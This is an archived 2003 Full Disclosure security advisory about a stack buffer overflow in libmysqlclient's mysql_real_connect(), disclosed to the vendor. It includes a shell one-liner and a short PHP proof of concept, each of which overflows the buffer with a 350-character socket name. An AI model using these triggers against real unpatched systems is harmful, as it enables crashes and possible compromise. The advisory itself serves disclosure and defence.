Full Disclosure mailing list archives
libmysqlclient 4.x and below mysql_real_connect() buffer overflow.
From: pokleyzz <pokleyzz () scan-associates net>
Date: Thu, 12 Jun 2003 22:26:49 +0800
SCAN Associates Sdn Bhd Security Advisory Products: libmysqlclient 4.x and below (http://www.mysql.com) Date: 12 June 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net>Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net
URL: http://www.scan-associates.net Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow. Description ===========libmysqlclient is client library to communicate with mysql server.
Details =======There is stack buffer overflow in mysql_real_connect() function with long unix socket name (over 300 character).
ex: mysql -S `perl -e 'print "A" x 350'` -hlocalhost proof of concept ---------------- This bug have succesfully test on safe_mode php in our latest geeklog bughttp://www.scan-associates.net/papers/geeklog.txt where user can upload *.php file.
<?php for ($i;$i<350;$i++) $buff .= "A"; ini_set("mysql.default_socket","$buff"); mysql_connect("localhost", "blabla", "blabla"); ?>Vendor Response =============== Vendor has been contacted on 06/01/2003 and fix will available soon.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- libmysqlclient 4.x and below mysql_real_connect() buffer overflow. pokleyzz (Jun 12)